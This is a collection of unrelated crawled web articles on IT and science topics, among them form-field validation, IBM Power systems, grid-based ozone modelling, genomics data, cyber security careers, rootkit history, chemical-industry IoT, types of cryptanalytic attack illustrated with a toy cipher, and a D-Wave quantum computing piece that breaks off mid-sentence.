When should I choose "text" or "number" or "multiple choice?" How you define a field will affect the type of data you get back, as well as its accuracy. "Text" is for fields with free text, where either letters only, or a mix of numbers and letters, is filled in. "Short text" allows under 50 characters, "Medium text" allows under 70 characters, and "Long text" allows up to 2,000 characters. "Number" is for answers that include numbers and perhaps certain symbols, but no letters. If the number might have a decimal in it, select "decimal." If it is a whole number, select "whole number." You can also set constraints on the range and select which characters to allow in the answer. Use "Multiple-choice" whenever there are a finite number of possible answers. For example, if you are collecting contact information from people in three states, you can mark the State field as a multiple-choice field, even if people will be handwriting their state, since there are only three options. "Select-1" is for multiple-choice questions with only one possible answer. "Select-many" is for multiple-choice questions that allow more than one answer.
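These field types map naturally onto simple validation rules. The Python sketch below shows that idea only; the field definitions, constraint names, and example values are invented for illustration and are not the product's actual schema.

def validate(value, field):
    kind = field["type"]
    if kind == "text":
        return len(value) <= field.get("max_len", 2000)
    if kind == "number":
        try:
            number = float(value) if field.get("decimal") else int(value)
        except ValueError:
            return False
        low, high = field.get("range", (float("-inf"), float("inf")))
        return low <= number <= high
    if kind == "multiple_choice":
        return value in field["choices"]
    return False

state_field = {"type": "multiple_choice", "choices": ["CA", "NY", "TX"]}
print(validate("NY", state_field), validate("FL", state_field))   # True False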
<urn:uuid:14997386-2b00-4478-86a3-3629f6aede94>
CC-MAIN-2017-04
https://support.captricity.com/faqs/selecting-field-type/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281151.11/warc/CC-MAIN-20170116095121-00202-ip-10-171-10-70.ec2.internal.warc.gz
en
0.915287
270
2.734375
3
A Survey of IBM Power Systems Initiatives in Large-Scale Computing The amount of data being produced does not seem to show any sign of slowing; if anything, it may in fact be exceeding projected growth rates. As these absolute limitations on raw hardware capacity begin to be felt, the importance of looking at all of the aspects of a computing infrastructure in order to tackle the future's truly large-scale computing demands, is imperative. This white paper examines how IBM's initiatives like Linux, Cloud Manager with OpenStack and the OpenPower Foundation IBM are meeting this challenge. In a paper published fifty years ago, Gordon Moore proposed his now-famous theory that the number of components per integrated circuit would double every two years. Moore's Law, as it became known, tends to be used primarily to describe the increase in computing capacity of CPUs. In tandem with the growth in CPU capacity, Moore also accurately predicted the exponential growth in volumes of data manipulated by progressively faster CPUs, as well as the ability to perform increasingly more complex operations on these volumes of data. In 2013 Google reported that the number of unique webpages in its search index stood at 30 trillion unique pages; the size of the index data itself weighed in at 1,000 terabytes. Yet, searching that index for "Moore's Law" will reliably return a result in well under a second. Manipulating data on such a scale and at such speed until recently has been restricted to a few very large players like Google, Yahoo, or Microsoft, using custom crafted and closely guarded proprietary solutions. In recent years there has also been a great deal of work done by the open source sector on large-scale computing projects. Perhaps the best example of this is the Hadoop project. Originating as the Nutch project at the University of Washington in 2002, Hadoop is now the primary implementation of the Map/Reduce methodology used to break down large problems into discrete chunks, each of which can be solved in parallel in a compute cluster. This produces linear scalability of computing capacity and hence the problem with cluster size. Today, state-of-the art has come to a point where IBM is integrating its developmentally mature Power computing architecture with a variety of IBM proprietary and open source projects to bring to the market off-the-shelf solutions allowing for broader adoption of large-scale computing capabilities for all customers. In this paper we will examine four such initiatives: the use of Linux on Power, the IBM Data Engine for Analytics, IBM Cloud Manager with OpenStack, and the OpenPower Foundation. Linux on Power As an operating system, Linux is most often associated with x86 hardware. This was certainly true when Linux was in its early growth years in the academic and hobbyist market. Linux was a good, free operating system that ran on inexpensive commodity x86 hardware. In the commercial marketplace, however, IBM has always been a strong supporter of Linux as an alternative operating system to closed source systems. In 1999 then IBM Vice President Sam Palmisano commissioned a study of Linux that resulted in CEO Lou Gerstner announcing that in IBM's eyes Linux would become "strategic to its software and server strategy." That announcement was followed up by the establishment that year of the IBM Linux Technology Center. The following year IBM publicly pledged to invest $1billion in Linux and the open source movement. 
Within the next two years IBM was running Linux on its core zSeries mainframe hardware, in 2007 IBM was a founding member of the Linux Foundation, and in 2011 IBM's cognitive computing engine, Watson, famously won "Jeopardy." Watson ran on Linux and was physically implemented on Power architecture. By this point Linux had become a significant development platform for large-scale and cloud computing projects. Recognizing this, in 2012 IBM announced that in the Power7 product line they would start shipping Linux-only models, released at a price point competitive with enterprise x86 hardware, and designed to support Linux KVM virtualization out of the box. In 2013 IBM announced a second $1billion investment, this one directed specifically at promoting Linux on the Power platform. The fourth Linux Technology Center also opened that year in Montpellier, France, adding to existing Linux centers in Beijing, New York City, and Austin, Texas. Perhaps the most important Linux announcement in 2013, however, was the launch of the OpenPower Foundation, making key features of the Power processor architecture available under license to third-party hardware developers. Keep in mind, too, that with the 2014 sale of its xSeries product line to Lenovo, x86 is now the competition for IBM, hence it is imperative for IBM that Power servers are given the support they need to compete with their x86-based competitors.
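Returning to the Map/Reduce methodology described earlier, the pattern is easy to see in miniature: each chunk of input is processed independently in a map step, and the partial results are merged in a reduce step. The Python sketch below is a toy word count that illustrates the idea only; it is not Hadoop, and the input strings are made up.

from collections import Counter
from functools import reduce

chunks = [
    "power systems run linux",
    "linux scales out on power",
    "openpower opens the power platform",
]

def map_phase(chunk):
    return Counter(chunk.split())      # each chunk is counted independently, so chunks can run in parallel

def reduce_phase(left, right):
    return left + right                # Counter addition merges the partial counts

totals = reduce(reduce_phase, map(map_phase, chunks), Counter())
print(totals.most_common(3))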
<urn:uuid:a072147d-560f-421e-9585-573988b27434>
CC-MAIN-2017-04
https://www.globalknowledge.com/ca-en/resources/resource-library/white-paper/a-survey-of-ibm-power-systems-initiatives-in-large-scale-computing/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281151.11/warc/CC-MAIN-20170116095121-00202-ip-10-171-10-70.ec2.internal.warc.gz
en
0.958011
959
2.65625
3
Remember learning about ozone? It was easy to relate to that distinctive smell that signaled the onset of precipitation. Even the chemical formula had a simple elegance, O3. We learned that a layer of these triatomic molecules created a protective buffer way up in the earth’s atmosphere, and that this layer filters out up to 99 percent of the sun’s harmful UV radiation, which would otherwise cause DNA damage in humans and animals. Ozone has a bit of a dual nature, however: a life-sustaining substance at higher altitudes becomes an air pollutant when it occurs at ground level. And at higher concentrations, it can cause serious health problems. Scientists had already established that ozone concentrations, both in the atmosphere and on the earth’s surface, are linked to meteorological conditions, like temperature and prevailing winds, so perhaps long-term climate patterns would have a role to play as well. Eleni Katragkou, a climate scientist at the Aristotle University of Thessaloniki (AUTh) in Greece, decided to test this hypothesis. She wanted “to predict ozone behaviour in a changing climate, in order to be able to assess the impacts on air quality, human health, agricultural production and ecosystems.” “People with lung diseases, children, older adults, and people who are active outdoors may be particularly sensitive to ozone,” Katragkou explained. “[Ozone] also affects sensitive vegetation and can damage crop production and ecosystems.” Using the grid computing resources of the AUTh computing centre (an EGI site), Katragkou’s team performed a series of regional climate-air quality simulations for two future decades (2041–2050 and 2091–2100) and one control decade (1991–2000) to study the impact of climate change on surface ozone in Europe. The simulations relied on an established emissions scenario, called A1B, developed by the Intergovernmental Panel on Climate Change (IPCC). The conclusions, published in the Journal of Geophysical Research, indicate that levels of ground-level ozone are set to increase near the end of the century, with the highest concentrations expected for south-west Europe. The grid resources were crucial for the accuracy of the model, and allowed the simulations to be done in a reasonable time frame. Performed on a single desktop computer, the same job would have taken 40 years to complete. “The usual bottleneck for performing those types of simulations at a finer resolution is the huge demands on CPU time. This makes me think that grid computing may facilitate very much our future work in this direction,” Katragkou stated.
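The reason grid resources help so much is that a multi-decade regional simulation decomposes into many independent work units. The sketch below is not the team's code or the EGI middleware; it is a hedged toy in Python showing the general pattern of farming out year-and-region chunks in parallel, with a placeholder function standing in for the (far more expensive) climate-air quality model.

```python
from concurrent.futures import ProcessPoolExecutor
from itertools import product

def run_cell(task):
    # Placeholder "model" run: returns a fake mean surface-ozone value for
    # one year and sub-region. The real model would run for hours per unit.
    year, region = task
    return (year, region, 30.0 + 0.1 * (year - 1991))

decades = {"control": range(1991, 2001), "future_mid": range(2041, 2051)}
regions = ["NW-Europe", "SW-Europe", "SE-Europe"]

# Each (year, region) pair is an independent job a grid site can schedule.
tasks = list(product(decades["control"], regions))
with ProcessPoolExecutor() as pool:
    results = list(pool.map(run_cell, tasks))

print(len(results), "independent work units completed")
```

Because the units do not depend on one another, wall-clock time shrinks roughly in proportion to the number of CPUs available, which is what turns a 40-year desktop job into something tractable.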
<urn:uuid:675161ba-a44c-434f-9899-39884bbe78cf>
CC-MAIN-2017-04
https://www.hpcwire.com/2013/01/25/grid_facilitates_ozone_predictions/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281151.11/warc/CC-MAIN-20170116095121-00202-ip-10-171-10-70.ec2.internal.warc.gz
en
0.94575
552
3.96875
4
The leap forward in genomics technology promises to change health care as we know it. Sequencing a human genome, which cost millions of dollars just a few years ago, now costs thousands. And the prospect of mapping a genome for under a thousand dollars is on the horizon. But cheap gene sequencing, by itself, won’t usher in a health care revolution. An article in the New York Times this week points out that turning those sequenced genomes into something useful is the true bottleneck. Doctors would like to be able to use their patients’ genomes to determine their susceptibility to specific diseases or to devise personalized treatments for conditions they already have. Sequencing all the DNA base pairs is really the easy part of the problem. It just reflects the ordering of these bases — adenine (A), thymine (T), guanine (G), cytosine (C) — in the chromosomes. The bioinformatics software necessary to extract useful information from this low-level biomolecular alphabet is much more complex and therefore costly, and necessitates a fair amount of computing power. According to David Haussler, director of the center for biomolecular science and engineering at the University of California, Santa Cruz, that’s why it costs more to analyze a genome than to sequence it, and that discrepancy is expected to grow as the cost of sequencing falls. The NYT article reports that the cost of sequencing a human genome has decreased by a factor of more than 800 since 2007, while computing costs have only decreased by a factor of four. That has resulted in an enormous accumulation of unanalyzed data being generated by all the cheap sequencing equipment. According to the article, the current worldwide capacity of sequencers is 13 quadrillion DNA base pairs per year. For this year alone, it is estimated that 30,000 human genomes will be sequenced, a figure that is expected to rise to the millions within just a few years. Not only is that too much data to analyze in aggregate, it’s also too difficult to share that volume of data between researchers. Even the fastest commercial networks are too slow to send multiple terabytes of information in anything less than a few weeks. That’s why BGI (Beijing Genomics Institute), the largest genomics research institute in the world, has resorted to sending computer disks of sequenced data via FedEx. Cloud computing may help alleviate these problems. In fact, some believe that Google alone has enough compute and storage capacity to handle the global genomics workload. Others believe that there is just too much raw data and researchers will have to pre-process it to reduce the volume or just hold onto the unique bits. But there are even more challenging problems ahead. Metagenomics, which aggregates the DNA sequences of a whole population of organisms, is even more data-intensive. For example, the microbial species in the human digestive tract represent about a million times as much sequenced data as the human genome. And since that microbial population can have a profound effect on its human host, that genomic data becomes a pseudo-extension of the person’s genetic profile. On top of all that is the data associated with the RNA, proteins and other various biochemicals in the body. To get a complete picture of human health, all of this data has to be integrated as well. Data deluge indeed.
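A quick back-of-envelope calculation shows why shipping disks can beat the network for data at this scale. The figures below are illustrative assumptions, not numbers from the article, but the arithmetic makes the point.

```python
# Rough transfer-time comparison for a hypothetical 50 TB sequencing dataset.
dataset_tb = 50
dataset_bits = dataset_tb * 8e12          # decimal terabytes -> bits

for label, bits_per_second in [("100 Mbit/s link", 100e6), ("1 Gbit/s link", 1e9)]:
    seconds = dataset_bits / bits_per_second
    print(f"{label}: {seconds / 86400:.1f} days")   # ~46 days and ~4.6 days

print("Overnight courier with disks: ~1 day, regardless of dataset size")
```

Even a sustained gigabit link (rarely achievable end to end in practice) needs days for tens of terabytes, which is why physically mailing drives remains a common workaround.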
<urn:uuid:d94bd833-4aa9-4837-be7a-671fcebb8bd1>
CC-MAIN-2017-04
https://www.hpcwire.com/2011/12/01/genomics_drowning_in_data/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281574.78/warc/CC-MAIN-20170116095121-00110-ip-10-171-10-70.ec2.internal.warc.gz
en
0.949145
697
3.078125
3
With some record-breaking and headline-grabbing cyber security breaches in 2015, security is top of mind for a large part of the population. However, if you ask millennials (people ages 18 to 26) how they view cyber security, you might get a different perspective. For this group of young adults – many of whom are about to enter the workforce – cyber security isn’t all that notable and it’s not career path they’re interested in. An October 2015 survey of millennials, conducted by Raytheon and the National Cybersecurity Alliance, took a deeper look at millennials’ attitudes toward cyber security careers. After polling young adults in 12 countries about their interest level and perception toward the field, the survey offers some helpful insights into cyber security recruitment barriers, and points to some key takeaways for solving this global problem. According to the report, there are four main contributing factors in millennials’ lagging interest in cyber careers: - Low awareness in schools. A majority of respondents (62%) indicated that no teacher or guidance counselor mentioned cyber security as a possible career path. And only 31% indicated that they were given coursework that would help prepare them for the career path. - Overconfidence. A majority of the individuals interviewed (65%) believe they have the ability to keep themselves safe online. Yet 44% of those who experienced a cyber attack did not change their behavior in response. - Lack of engagement. Security breaches may be showing up in the headlines, but they don’t seem to be reaching young adults’ social media feeds. Sixty-two percent of survey respondents hadn’t heard about a cyber attack in the past year. - A wide gender gap. The survey’s findings re-confirmed that there is a serious gender gap in cyber security, and it’s one that’s continuing with the millennial generation. In the U.S., 36% of surveyed women expressed disinterest in cyber security as a career path, compared to 12% of men. More women than men felt they were unqualified for cyber security programs and courses, and women were more likely to report that no teacher or guidance counselor mentioned the career track. Clearly, younger generations need more exposure to the field of cyber security. Courses that offer hands-on experience with analysis and problem-solving can go a long way, as can career opportunities for young people to interact with real-world cyber security professionals. The risks presented by cyber crime are enormous — threatening businesses, government agencies and individuals alike. As such, the need to train, attract and retain the next generation of cyber security professionals is greater than ever. The Lunarline School of Cyber Security offers opportunities for professionals of all levels to learn cyber security principles in a way that’s hands-on and interactive. For more information on the courses and certifications we offer and our approach to education, visit SchoolofCyberSecurity.com or contact us today.
<urn:uuid:9fdef1a7-360a-4f7d-a08c-0bd98c8d7c27>
CC-MAIN-2017-04
https://lunarline.com/blog/2015/11/4-reasons-millennials-overlooking-cyber-security-careers/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279368.44/warc/CC-MAIN-20170116095119-00414-ip-10-171-10-70.ec2.internal.warc.gz
en
0.954949
610
2.578125
3
In 2006, Santa Clara University began rolling out a Wi-Fi network as a way to supplement the school's existing production network. The initial deployment consisted of about 800 Cisco Aironet 1131 a/b/g access points and Cisco WiSM controllers. As expansion or renovation projects occurred, the school added some 802.11n access points, but until recently 90% of the roughly 70 buildings on campus were equipped with the older, slower technology. Todd Schmitzer, network and telecommunications manager at SCU, says the original Wi-Fi network was designed to provide expanded 'convenience' access to the campus network from academic, administrative, and residence hall locations. It was never intended as a production network or the sole mechanism for people to access the campus network. It did not cover all locations (only the common occupied spaces), did not provide for high-density use (classrooms, theaters, dining halls), or provide nearly the bandwidth of the wired network.
<urn:uuid:8cf0580f-7f67-4054-abcd-3d0259361edb>
CC-MAIN-2017-04
http://www.computerworld.com/article/2487336/networking/case-study--santa-clara-u--graduates-to-gigabit-wi-fi.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.22/warc/CC-MAIN-20170116095120-00138-ip-10-171-10-70.ec2.internal.warc.gz
en
0.951782
203
2.671875
3
Kaspersky Lab, a leading developer of secure content management solutions, announces the release of the article "Rootkit Evolution" by Alisa Shevchenko, a virus analyst at the company. This article by Alisa Shevchenko is the second in a series devoted to the evolution of viruses and antivirus solutions. The author defines rootkits as "programs that evade or circumvent standard system mechanisms by using stealth techniques to hide system objects, such as files, processes, etc." and provides an overview of rootkit evolution from their first appearance to the present day. The article is aimed at readers with some technical knowledge who require the historical background to a topic currently widely discussed in the IT security industry. It focuses on Windows rootkits: as Windows is the most widely-used operating system, rootkits targeting this system are the most commonly used by virus writers. Although the term rootkit has its origins in the UNIX world, contemporary Windows rootkits actually stem from the DOS stealth viruses which first appeared in the 1990s. These viruses were designed to hide themselves from the user and from AV programs; it was only later that these techniques were used by Windows rootkits to hide other malware. Windows rootkits made their appearance approximately ten years after DOS stealth viruses, and the author provides an overview of their origins, the first implementation of such programs, and their functionality. Once it became clear how rootkit technologies could be developed, these technologies started being incorporated into a wide range of malicious programs. However, initially the number of malicious rootkits and the ways in which they were applied was relatively small. By 2005, the use of rootkit technologies was widespread; media attention was drawn to the issue, and found that these technologies were not only used in malware, but also, seemingly, in commercial products. One example of this was the Sony DRM scandal in 2006. Both the AV industry and independent researchers responded to the use of rootkit technologies and produced a large number of technologies, products and tools designed to combat rootkits. The article addresses recent trends such as bootkits (rootkits which run during the boot sequence); a 'mythical' rootkit called Rustock.c, which was discussed widely on the Internet towards the end of 2006; and rootkits for non-Windows systems such as OS X (Macintosh) and mobile operating systems. The author concludes that although "rootkits…no longer cause any particular excitement…the concept of evading systems is obviously still valid and we are very likely to see new threats implementing stealth technologies". The full version of the article is available at
<urn:uuid:acf277d4-7aee-4162-b40c-ca446eaf54b3>
CC-MAIN-2017-04
http://www.kaspersky.com/au/about/news/virus/2008/Kaspersky_Lab_announces_the_publication_of_the_analytical_article_Rootkit_Evolution_
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281202.94/warc/CC-MAIN-20170116095121-00046-ip-10-171-10-70.ec2.internal.warc.gz
en
0.965082
539
2.8125
3
Chemical firms are embracing the Internet of Things, and in doing so, they are making new partnerships possible. Technology improvements allow firms to partner with companies in many fields. With chemical manufacturing’s thin profit margins, these partnerships make prudent business sense. Energy and tech firms are new potential partners, as are equipment makers. Firms with vision see possible ties with customers and subcontractors as well. The Internet of Things (IoT) is driving these new connections. The IoT refers to the use of sensors, computers, and wireless connections to connect physical objects to each other. By 2020, it’s estimated that between 30 billion and 50 billion objects will be connected. These connected objects will automate processes, find and self-correct problems, and record and send data to central servers. All of this data can be analyzed to modify and improve products and processes. The Internet of Things and the chemical industry As the cost of sensors and storage drops, so do the barriers to entry into the many possibilities available to the chemical industry. The technologies allow improved product security and safety. With connected products, processes, and people, firms can improve performance, minimize supply chain issues, and improve product quality. Let’s take a closer look at some of the possibilities and partnerships these smart technologies offer. Downtime and unplanned maintenance are common issues in the chemical industry. Smart technology is solving those issues through the use of sensors that track quality and performance. Computers are raising or even addressing issues in real time to reduce equipment breakdowns. Equipment is more effective and maintenance is more efficient. Connected devices generate vast amounts of data. Powerful analytics programs can interpret that data to improve quality. Augmented reality uses 3D visualization tools to improve maintenance and service. Take, for example, the issue of batch quality. Most chemical makers can only assess a limited number of batches at a time. Big Data tools now enable thousands of batches to be analyzed together. This metadata lets companies improve production processes, yield rates, order fill rates, and per-batch costs. Farmers today want to use chemicals in precise ways to produce higher yields. This “precision farming” requires a trusting partnership among many vested partners. Farmers need to work with agribusiness suppliers and chemical makers. Tech firms, equipment makers, and traders are also key players. Successful precision farming requires tech platforms to handle large amounts of data. All stakeholders need to be able to access the data and collaborate in a secure virtual environment. How does it all work? Imagine a system where sensors are constantly measuring soil quality. Data on water, nutrients, and pesticides are recorded and correlated. Analytics predict weather and its impact on a crop and adjust the rates and amounts of applied materials. Yields and quality are tracked and analyzed to find optimal ratios. Overlaid pricing and expense models recommend crops with the highest possible profit margins. The results are significant in many areas. Farmers are more profitable. More people are fed with less environmental impact. Manufacturers improve future versions of equipment, seeds, and chemicals. Reducing friction along the logistics chain is much improved with the IoT. Sensors and RFID tags can ensure products remain quarantined or in specific locations. 
Contamination and attacks, either physical or cyber, can be detected faster and authorities alerted. Dispatchers can track transportation fleets in real time to predict and track deliveries. Warehouse operations become far more efficient with these newer tools. With virtual reality, users can “see” products in real time, reducing the need for warehouse pick lists. Trackable specs and expiration dates can improve the efficiency of picking, packing, and put-away work. Data analysis can reveal the best use of available space and how to coordinate with suppliers on receivables. Reducing energy expenses Energy usage and regulatory controls are significant costs for most chemical manufacturers. IoT devices can address both concerns. Installed sensors track energy usage and predict outages. Collected data ensure and verify regulatory compliance. Analytics identify usage patterns and inefficiencies. Firms can make better decisions about energy purchases. Conservation measures can be identified. Not only do these tools offer cost reduction, they create greener operations. Developing a strategy So how do chemical firms develop a strategy that allows for these complex partnerships to develop and persist? Here are six considerations. Innovate: Rapid advances in mobile. cloud and Big Data technologies are bound to continue. Firms that embrace these technologies and infuse them in planning are likely to take the lead and increase market share. Think green: Whether your firm is B2B or B2C, IoT products can lead to greener outcomes and add marketable value to your line. Global view: Connected supply chains, distribution, and products allow for a global operational perspective as well as global business opportunity. Data and analytics: With more connected products comes more data. Chemical firms need to address storage capacities and tools to crunch all those numbers. Fortunately, cloud-based storage costs continue to drop and Big Data analytics tools are becoming more robust. Infrastructure partners: Hardware, software, sensors, applications, telematics, and mobile devices are a part of your business now. View the vendors as strategic partners. Collaborate with them on new products and procedures. Vigilance: Threats of attack and contamination are all too real in the chemical industry. Today firms need to also consider customer data protection and privacy. One downside to IoT is the proliferation of products that can be hacked, stolen, or tampered with. Smart products provide extraordinary opportunity in the chemical industry. Firms that embrace the need to change and find vertical and horizontal partners will be well positioned. Rich data will allow for better-informed decisions on operations and revenue opportunities. Start your journey now! Learn more about the value digital transformation brings to your company and establish the right platform and road map for transition. About Stefan Guertzgen Dr. Stefan Guertzgen is the Global Director of Industry Solution Marketing for Chemicals at SAP. He is responsible for driving Industry Thought Leadership, Positioning & Messaging and strategic Portfolio Decisions for Chemicals.
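As a concrete illustration of the sensor-analytics pattern described in the article (batch quality, predictive maintenance, energy monitoring), here is a minimal, hypothetical sketch: readings from a connected meter are compared against a recent baseline and outliers are flagged for review. The data, thresholds and device are invented for illustration only; production systems would use streaming platforms and far richer statistical models.

```python
import statistics

# Hourly energy readings (kWh) from a hypothetical connected meter.
readings_kwh = [402, 398, 410, 405, 399, 512, 401, 397]

# Build a simple baseline from the first few readings.
baseline = statistics.mean(readings_kwh[:5])
spread = statistics.stdev(readings_kwh[:5])

# Flag any reading that deviates strongly from the baseline.
for hour, value in enumerate(readings_kwh):
    if abs(value - baseline) > 3 * spread:
        print(f"hour {hour}: reading {value} kWh flagged for review")
```

The same pattern, with different inputs, covers batch-quality outliers or vibration spikes on rotating equipment: collect, baseline, flag, and feed the flags back into maintenance or production decisions.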
<urn:uuid:ce94318c-23a5-4c9f-a270-5e5733f72fd2>
CC-MAIN-2017-04
http://www.ioti.com/industrial-iot/chemical-industry-4-opportunities-provided-internet-things
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283689.98/warc/CC-MAIN-20170116095123-00440-ip-10-171-10-70.ec2.internal.warc.gz
en
0.919074
1,272
2.6875
3
More and more devices are getting sensors embedded in them to sense their internal and external status. There are many examples, like intelligent energy-saving lighting systems, keyless entry systems in a car, internet-enabled microwaves, refrigerators, home security systems, automatic focus or illumination detection in cameras, temperature and air-conditioning control in rooms, global positioning systems in cell phones, other location sensors, smart cards for keyless entry systems, credit cards, etc. Sensors and sensory devices are also commonly attached to or embedded in living beings for monitoring or supporting life, like the pacemakers that detect an arrhythmic heart beat and compensate for the same, drug delivery systems for pain relief in terminally ill patients, monitoring systems for people released on parole, and alarm systems put on the elderly or very young to enable near and dear ones to monitor any sign of distress in them. Imagine if all such sensors existed in all living beings and non-living objects, were connected online and available 24x7 on a mobile device using the internet, and we had unlimited or secure, restricted access to all this information to leverage as per authorizations. The possibility of leveraging this information for decision making in the real world will open unlimited possibilities for newer applications, provide a huge amount of comfort and relieve humans of many mundane activities. This is the concept of the internet of things. It has already started to attract attention from many large, leading companies. Companies are working on making sensors which can be embedded in or attached to all living beings and non-living objects, gather their conditions and be ready to communicate with the rest of the world. Companies are working on embedding such devices in objects or as implants in living beings. Companies are working on creating communication protocols for connections with the internet. Companies are working on integrating this information and accessing it on the web with user-owned devices to leverage the same. Applications are many. A property and casualty insurance company can integrate tsunami, hurricane and storm sensors with the demographic information of properties to assess likely impacts and issue preventive action warnings to their insured. Life insurance companies can monitor medication and the condition of the elderly and extend life spans. Motor insurance companies can view the driving patterns of drivers as well as advise on personalized insurance plans. Cars can detect possible collision scenarios and navigate themselves out of the same. One can manage and operate all home appliances remotely or automate their operation based on alarms and thresholds set. This is the new world of the internet of things, where the level of automation is such that most human intervention will only be to define the rules, leaving all regular operations to the sensors and devices of the world.
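The "define the rules once, then let the devices act" idea from the passage can be sketched very simply. The device names, thresholds and actions below are hypothetical; real deployments would use a messaging protocol such as MQTT and a proper rules engine, but the shape of the logic is the same.

```python
# A tiny rule table mapping sensor readings to actions (illustrative only).
rules = [
    {"sensor": "living_room_temp", "above": 26.0, "action": "turn_on_ac"},
    {"sensor": "front_door", "equals": "open", "action": "send_alert"},
    {"sensor": "medication_box", "equals": "missed_dose", "action": "notify_caregiver"},
]

def evaluate(sensor, value):
    # Return the first action whose rule matches the incoming reading.
    for rule in rules:
        if rule["sensor"] != sensor:
            continue
        if "above" in rule and value > rule["above"]:
            return rule["action"]
        if "equals" in rule and value == rule["equals"]:
            return rule["action"]
    return None

print(evaluate("living_room_temp", 27.5))         # -> turn_on_ac
print(evaluate("medication_box", "missed_dose"))  # -> notify_caregiver
```

Once such rules are defined and authorized, the routine monitoring and responses run without human intervention, which is exactly the division of labour the article describes.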
<urn:uuid:d7ffb936-401e-4ad2-81dc-ebcdec9a4925>
CC-MAIN-2017-04
https://www.hcltech.com/blogs/rsodhi/leveraging-eco-system-internet-things
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279410.32/warc/CC-MAIN-20170116095119-00258-ip-10-171-10-70.ec2.internal.warc.gz
en
0.939471
525
2.8125
3
2.4.2 What are some of the basic types of cryptanalytic attack? Cryptanalytic attacks are generally classified into six categories that distinguish the kind of information the cryptanalyst has available to mount an attack. The categories of attack are listed here roughly in increasing order of the quality of information available to the cryptanalyst, or, equivalently, in decreasing order of the level of difficulty to the cryptanalyst. The objective of the cryptanalyst in all cases is to be able to decrypt new pieces of ciphertext without additional information. The ideal for a cryptanalyst is to extract the secret key. A ciphertext-only attack is one in which the cryptanalyst obtains a sample of ciphertext without the plaintext associated with it. This data is relatively easy to obtain in many scenarios, but a successful ciphertext-only attack is generally difficult and requires a very large ciphertext sample. A known-plaintext attack is one in which the cryptanalyst obtains a sample of ciphertext and the corresponding plaintext as well. A chosen-plaintext attack is one in which the cryptanalyst is able to choose a quantity of plaintext and then obtain the corresponding encrypted ciphertext. An adaptive-chosen-plaintext attack is a special case of chosen-plaintext attack in which the cryptanalyst is able to choose plaintext samples dynamically, and alter his or her choices based on the results of previous encryptions. A chosen-ciphertext attack is one in which the cryptanalyst may choose a piece of ciphertext and attempt to obtain the corresponding decrypted plaintext. This type of attack is generally most applicable to public-key cryptosystems. An adaptive-chosen-ciphertext attack is the adaptive version of the above attack. A cryptanalyst can mount an attack of this type in a scenario in which he has free use of a piece of decryption hardware, but is unable to extract the decryption key from it. Note that cryptanalytic attacks can be mounted not only against encryption algorithms, but also, analogously, against digital signature algorithms (see Question 2.2.2), MACing algorithms (see Question 2.1.7), and pseudo-random number generators (see Question 2.5.2).
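A deliberately weak toy cipher makes the known-plaintext category concrete. The single-byte XOR "cipher" below is not a real cryptosystem; the point is only to show what the attacker's information looks like: one ciphertext together with its plaintext is enough to recover the key and then decrypt everything else encrypted under it.

```python
def xor_cipher(data: bytes, key: int) -> bytes:
    # Toy cipher: XOR every byte with a single secret key byte.
    return bytes(b ^ key for b in data)

secret_key = 0x5A
plaintext = b"attack at dawn"
ciphertext = xor_cipher(plaintext, secret_key)

# Known-plaintext attack: one (plaintext, ciphertext) pair reveals the key.
recovered_key = plaintext[0] ^ ciphertext[0]
assert recovered_key == secret_key

# Any new ciphertext under the same key can now be decrypted.
new_ciphertext = xor_cipher(b"retreat at dusk", secret_key)
print(xor_cipher(new_ciphertext, recovered_key))  # b'retreat at dusk'
```

Real algorithms are designed so that even large quantities of known or chosen plaintext do not leak the key this way, which is why the stronger attack categories matter as design benchmarks.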
<urn:uuid:b5d9370d-b815-42d9-ae10-1663ae8e6527>
CC-MAIN-2017-04
https://www.emc.com/emc-plus/rsa-labs/standards-initiatives/basic-types-of-cryptanalytic-attack.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280668.34/warc/CC-MAIN-20170116095120-00074-ip-10-171-10-70.ec2.internal.warc.gz
en
0.92297
473
3.296875
3
The CEO of a quantum computing company walked onto a stage at MIT and stood in front of an audience of professors, engineers and computer scientists. Vern Brownell, CEO of D-Wave Systems Inc., looked out at the crowd and said, "I cannot explain how quantum computing works." Was he heckled? Did attendees get up and leave? No. No one in the audience stirred. There was no murmuring. Nobody laughed. No sidelong glances. Nothing. Quantum computing is just that confusing. Some of the world's best physicists don't understand how it works. Nobel Laureate physicist Richard Feynman is widely quoted as saying, "If you think you understand quantum mechanics, you don't understand quantum mechanics." Despite how complex the idea of a quantum computer is and the fact that some physicists say we're as much as 50 years away from seeing one, D-Wave, a quantum computing company based in Burnaby, British Columbia, said it is building them. NASA, Google and Lockheed Martin are testing them. "If you want to buy a quantum computer, I can sell you one today," Brownell said at an MIT Tech Conference in February that focused on disruptive technologies. Those kinds of statements have created a buzz in both the world of physics and the world of computing because many believe quantum computing holds a lot of promise. It's like the Holy Grail of supercomputing. Think of a computer that could surpass the top classic supercomputers in some calculations, especially problems where you have to search through a lot of data, finding answers to questions so complex that machines like IBM's Blue Gene and Cray's systems might need hundreds of years to solve, or might never solve them. D-Wave CEO Vern Brownell Quantum computers might help researchers seeking cures for cancer, advance cryptography or find distant planets. They also could be used to simulate political and military situations, such as the unrest in Ukraine, enabling researchers or a government to test different options and see how they would affect the outcome. Quantum computers rewrite the rules of how computing works. Classic computers use bits -- ones and zeroes -- for processing instructions, and they work based on a series of instructions. Ask the computer a question, and it will move through the calculation in a linear, orderly way. A quantum computer combines computing with quantum mechanics, one of the most mysterious and complex branches of physics. The field was created to explain physical phenomena, like the odd actions of subatomic particles, that classical physics fails to do. One of the rules of quantum mechanics is that a quantum system can be in more than one state at once. But that concept goes against what's known of the world. Something can be green or red but it cannot be green and red at the same time. That's not the case with quantum mechanics. Each bit in a quantum machine -- known as qubits -- can be both a one and zero. It's about possibilities. When a qubit is constructed, it's built so you don't know if it's a one or a zero. It has the possibility of being both. The D-Wave system with the 512 qubit chip is being tested 